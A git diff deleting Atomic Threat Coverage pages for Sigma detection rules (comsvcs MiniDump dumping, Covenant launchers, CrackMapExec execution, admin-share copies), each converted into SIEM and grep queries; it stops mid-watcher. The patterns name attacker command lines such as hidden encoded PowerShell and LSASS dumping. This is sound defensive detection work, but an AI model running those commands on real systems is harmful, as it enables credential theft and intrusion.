-((Image.keyword:*\\rundll32.exe OR OriginalFileName:"RUNDLL32.EXE") AND CommandLine.keyword:(*comsvcs*MiniDump*full* *comsvcs*MiniDumpW*full*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\rundll32.exe" OR OriginalFileName="RUNDLL32.EXE") (CommandLine="*comsvcs*MiniDump*full*" OR CommandLine="*comsvcs*MiniDumpW*full*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\rundll32.exe" OR OriginalFileName="RUNDLL32.EXE") CommandLine IN ["*comsvcs*MiniDump*full*", "*comsvcs*MiniDumpW*full*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*.*\rundll32\.exe|.*RUNDLL32\.EXE)))(?=.*(?:.*.*comsvcs.*MiniDump.*full.*|.*.*comsvcs.*MiniDumpW.*full.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_control_dll_load.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_control_dll_load.md
deleted file mode 100644
index 09f9faa..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_control_dll_load.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Suspicious Control Panel DLL Load       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1073: DLL Side-Loading](https://attack.mitre.org/techniques/T1073)</li><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/rikvduijn/status/853251879320662017](https://twitter.com/rikvduijn/status/853251879320662017)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-10-002</li><li>attack.t1574.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Control Panel DLL Load
-id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819
-status: experimental
-description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
-author: Florian Roth
-date: 2017/04/15
-references:
-    - https://twitter.com/rikvduijn/status/853251879320662017
-tags:
-    - attack.defense_evasion
-    - attack.t1073
-    - attack.t1085
-    - car.2013-10-002
-    - attack.t1218
-    - attack.t1574.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\System32\control.exe'
-        CommandLine: '*\rundll32.exe *'
-    filter:
-        CommandLine: '*Shell32.dll*'
-    condition: selection and not filter
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\System32\\control.exe" -and $_.message -match "CommandLine.*.*\\rundll32.exe .*") -and  -not ($_.message -match "CommandLine.*.*Shell32.dll.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:*\\System32\\control.exe AND winlog.event_data.CommandLine.keyword:*\\rundll32.exe\ *) AND (NOT (winlog.event_data.CommandLine.keyword:*Shell32.dll*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Control Panel DLL Load",
-    "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1073",
-      "attack.t1085",
-      "car.2013-10-002",
-      "attack.t1218",
-      "attack.t1574.002"
-    ],
-    "query": "((winlog.event_data.ParentImage.keyword:*\\\\System32\\\\control.exe AND winlog.event_data.CommandLine.keyword:*\\\\rundll32.exe\\ *) AND (NOT (winlog.event_data.CommandLine.keyword:*Shell32.dll*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.ParentImage.keyword:*\\\\System32\\\\control.exe AND winlog.event_data.CommandLine.keyword:*\\\\rundll32.exe\\ *) AND (NOT (winlog.event_data.CommandLine.keyword:*Shell32.dll*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Control Panel DLL Load'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((ParentImage.keyword:*\\System32\\control.exe AND CommandLine.keyword:*\\rundll32.exe *) AND (NOT (CommandLine.keyword:*Shell32.dll*)))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\System32\\control.exe" CommandLine="*\\rundll32.exe *") NOT (CommandLine="*Shell32.dll*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (ParentImage="*\\System32\\control.exe" CommandLine="*\\rundll32.exe *")  -(CommandLine="*Shell32.dll*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\System32\control\.exe)(?=.*.*\rundll32\.exe .*)))(?=.*(?!.*(?:.*(?=.*.*Shell32\.dll.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_lateral_movement.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_lateral_movement.md
deleted file mode 100644
index 5c6ba08..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_lateral_movement.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Copy from Admin Share       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious copy command from a remote C$ or ADMIN$ share |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1077: Windows Admin Shares](https://attack.mitre.org/techniques/T1077)</li><li>[T1105: Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)</li><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1105: Ingress Tool Transfer](../Triggers/T1105.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrative scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1211636381086339073](https://twitter.com/SBousseaden/status/1211636381086339073)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Copy from Admin Share
-id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900
-status: experimental
-description: Detects a suspicious copy command from a remote C$ or ADMIN$ share
-references:
-    - https://twitter.com/SBousseaden/status/1211636381086339073
-author: Florian Roth
-date: 2019/12/30
-tags:
-    - attack.lateral_movement
-    - attack.t1077
-    - attack.t1105
-    - attack.t1021
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains:
-            - 'copy *\c$'
-            - 'copy *\ADMIN$'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Administrative scripts
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*copy .*\\c$.*" -or $_.message -match "CommandLine.*.*copy .*\\ADMIN$.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*copy\ *\\c$* OR *copy\ *\\ADMIN$*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/855bc8b5-2ae8-402e-a9ed-b889e6df1900 <<EOF
-{
-  "metadata": {
-    "title": "Copy from Admin Share",
-    "description": "Detects a suspicious copy command from a remote C$ or ADMIN$ share",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1077",
-      "attack.t1105",
-      "attack.t1021"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*copy\\ *\\\\c$* OR *copy\\ *\\\\ADMIN$*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*copy\\ *\\\\c$* OR *copy\\ *\\\\ADMIN$*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Copy from Admin Share'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*copy *\\c$* *copy *\\ADMIN$*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*copy *\\c$*" OR CommandLine="*copy *\\ADMIN$*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*copy *\\c$*", "*copy *\\ADMIN$*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*copy .*\c\$.*|.*.*copy .*\ADMIN\$.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_system32.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_system32.md
deleted file mode 100644
index dd1d6c1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_copy_system32.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Suspicious Copy From or To System32       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li><li>Admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120](https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120)</li></ul>  |
-| **Author**               | Florian Roth, Markus Neis |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Copy From or To System32
-id: fff9d2b7-e11c-4a69-93d3-40ef66189767
-status: experimental
-description: Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name
-author: Florian Roth, Markus Neis
-date: 2020/07/03
-references:
-    - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120
-logsource:
-    category: process_creation
-    product: windows
-tags:
-    - attack.defense_evasion
-detection:
-    selection:
-        CommandLine|contains: 
-            - ' /c copy *\System32\'
-            - 'xcopy*\System32\'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-    - Admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* /c copy .*\\System32\\.*" -or $_.message -match "CommandLine.*.*xcopy.*\\System32\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ \/c\ copy\ *\\System32\\* OR *xcopy*\\System32\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fff9d2b7-e11c-4a69-93d3-40ef66189767 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Copy From or To System32",
-    "description": "Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name",
-    "tags": [
-      "attack.defense_evasion"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\/c\\ copy\\ *\\\\System32\\\\* OR *xcopy*\\\\System32\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\/c\\ copy\\ *\\\\System32\\\\* OR *xcopy*\\\\System32\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Copy From or To System32'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* \/c copy *\\System32\\* *xcopy*\\System32\\*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* /c copy *\\System32\\*" OR CommandLine="*xcopy*\\System32\\*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* /c copy *\\System32\\*", "*xcopy*\\System32\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* /c copy .*\System32\\.*|.*.*xcopy.*\System32\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_covenant.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_covenant.md
deleted file mode 100644
index c881766..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_covenant.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Covenant Launcher Indicators       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious command lines used in Covenant luanchers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://posts.specterops.io/covenant-v0-5-eee0507b85ba](https://posts.specterops.io/covenant-v0-5-eee0507b85ba)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Covenant Launcher Indicators
-id: c260b6db-48ba-4b4a-a76f-2f67644e99d2
-description: Detects suspicious command lines used in Covenant luanchers
-status: experimental
-references:
-    - https://posts.specterops.io/covenant-v0-5-eee0507b85ba
-author: Florian Roth
-date: 2020/06/04
-tags:
-  - attack.execution
-  - attack.t1086
-  - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains:
-            - ' -Sta -Nop -Window Hidden -Command '
-            - ' -Sta -Nop -Window Hidden -EncodedCommand '
-            - 'sv o (New-Object IO.MemorySteam);sv d '
-            - 'mshta file.hta'
-            - 'GruntHTTP'
-            - '-EncodedCommand cwB2ACAAbwAgA'
-    condition: selection
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -Sta -Nop -Window Hidden -Command .*" -or $_.message -match "CommandLine.*.* -Sta -Nop -Window Hidden -EncodedCommand .*" -or $_.message -match "CommandLine.*.*sv o (New-Object IO.MemorySteam);sv d .*" -or $_.message -match "CommandLine.*.*mshta file.hta.*" -or $_.message -match "CommandLine.*.*GruntHTTP.*" -or $_.message -match "CommandLine.*.*-EncodedCommand cwB2ACAAbwAgA.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ \-Sta\ \-Nop\ \-Window\ Hidden\ \-Command\ * OR *\ \-Sta\ \-Nop\ \-Window\ Hidden\ \-EncodedCommand\ * OR *sv\ o\ \(New\-Object\ IO.MemorySteam\);sv\ d\ * OR *mshta\ file.hta* OR *GruntHTTP* OR *\-EncodedCommand\ cwB2ACAAbwAgA*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c260b6db-48ba-4b4a-a76f-2f67644e99d2 <<EOF
-{
-  "metadata": {
-    "title": "Covenant Launcher Indicators",
-    "description": "Detects suspicious command lines used in Covenant luanchers",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-Sta\\ \\-Nop\\ \\-Window\\ Hidden\\ \\-Command\\ * OR *\\ \\-Sta\\ \\-Nop\\ \\-Window\\ Hidden\\ \\-EncodedCommand\\ * OR *sv\\ o\\ \\(New\\-Object\\ IO.MemorySteam\\);sv\\ d\\ * OR *mshta\\ file.hta* OR *GruntHTTP* OR *\\-EncodedCommand\\ cwB2ACAAbwAgA*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-Sta\\ \\-Nop\\ \\-Window\\ Hidden\\ \\-Command\\ * OR *\\ \\-Sta\\ \\-Nop\\ \\-Window\\ Hidden\\ \\-EncodedCommand\\ * OR *sv\\ o\\ \\(New\\-Object\\ IO.MemorySteam\\);sv\\ d\\ * OR *mshta\\ file.hta* OR *GruntHTTP* OR *\\-EncodedCommand\\ cwB2ACAAbwAgA*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Covenant Launcher Indicators'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* \-Sta \-Nop \-Window Hidden \-Command * * \-Sta \-Nop \-Window Hidden \-EncodedCommand * *sv o \(New\-Object IO.MemorySteam\);sv d * *mshta file.hta* *GruntHTTP* *\-EncodedCommand cwB2ACAAbwAgA*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* -Sta -Nop -Window Hidden -Command *" OR CommandLine="* -Sta -Nop -Window Hidden -EncodedCommand *" OR CommandLine="*sv o (New-Object IO.MemorySteam);sv d *" OR CommandLine="*mshta file.hta*" OR CommandLine="*GruntHTTP*" OR CommandLine="*-EncodedCommand cwB2ACAAbwAgA*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* -Sta -Nop -Window Hidden -Command *", "* -Sta -Nop -Window Hidden -EncodedCommand *", "*sv o (New-Object IO.MemorySteam);sv d *", "*mshta file.hta*", "*GruntHTTP*", "*-EncodedCommand cwB2ACAAbwAgA*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* -Sta -Nop -Window Hidden -Command .*|.*.* -Sta -Nop -Window Hidden -EncodedCommand .*|.*.*sv o \(New-Object IO\.MemorySteam\);sv d .*|.*.*mshta file\.hta.*|.*.*GruntHTTP.*|.*.*-EncodedCommand cwB2ACAAbwAgA.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_execution.md
deleted file mode 100644
index 2be13b4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_crackmapexec_execution.md
+++ /dev/null
@@ -1,194 +0,0 @@
-| Title                    | CrackMapExec Command Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detect various execution methods of the CrackMapExec pentesting framework |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/byt3bl33d3r/CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.t1059.003</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: CrackMapExec Command Execution
-id: 058f4380-962d-40a5-afce-50207d36d7e2
-status: experimental
-description: Detect various execution methods of the CrackMapExec pentesting framework
-references:
-    - https://github.com/byt3bl33d3r/CrackMapExec
-tags:
-    - attack.execution
-    - attack.t1047
-    - attack.t1053
-    - attack.t1086
-    - attack.t1059.003
-    - attack.t1059.001
-author: Thomas Patzke
-date: 2020/05/22
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            # cme/protocols/smb/wmiexec.py (generalized execute_remote and execute_fileless)
-            - '*cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1'
-            # cme/protocols/smb/atexec.py:109 (fileless output via share)
-            - '*cmd.exe /C * > \\\\*\\*\\* 2>&1'
-            # cme/protocols/smb/atexec.py:111 (fileless output via share)
-            - '*cmd.exe /C * > *\\Temp\\* 2>&1'
-            # cme/helpers/powershell.py:139 (PowerShell execution with obfuscation)
-            - '*powershell.exe -exec bypass -noni -nop -w 1 -C "*'
-            # cme/helpers/powershell.py:149 (PowerShell execution without obfuscation)
-            - '*powershell.exe -noni -nop -w 1 -enc *'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*cmd.exe /Q /c .* 1> \\\\.*\\.*\\.* 2>&1" -or $_.message -match "CommandLine.*.*cmd.exe /C .* > \\\\.*\\.*\\.* 2>&1" -or $_.message -match "CommandLine.*.*cmd.exe /C .* > .*\\Temp\\.* 2>&1" -or $_.message -match "CommandLine.*.*powershell.exe -exec bypass -noni -nop -w 1 -C \".*" -or $_.message -match "CommandLine.*.*powershell.exe -noni -nop -w 1 -enc .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*cmd.exe\ \/Q\ \/c\ *\ 1>\ \\\\*\\*\\*\ 2>&1 OR *cmd.exe\ \/C\ *\ >\ \\\\*\\*\\*\ 2>&1 OR *cmd.exe\ \/C\ *\ >\ *\\Temp\\*\ 2>&1 OR *powershell.exe\ \-exec\ bypass\ \-noni\ \-nop\ \-w\ 1\ \-C\ \"* OR *powershell.exe\ \-noni\ \-nop\ \-w\ 1\ \-enc\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/058f4380-962d-40a5-afce-50207d36d7e2 <<EOF
-{
-  "metadata": {
-    "title": "CrackMapExec Command Execution",
-    "description": "Detect various execution methods of the CrackMapExec pentesting framework",
-    "tags": [
-      "attack.execution",
-      "attack.t1047",
-      "attack.t1053",
-      "attack.t1086",
-      "attack.t1059.003",
-      "attack.t1059.001"
-    ],
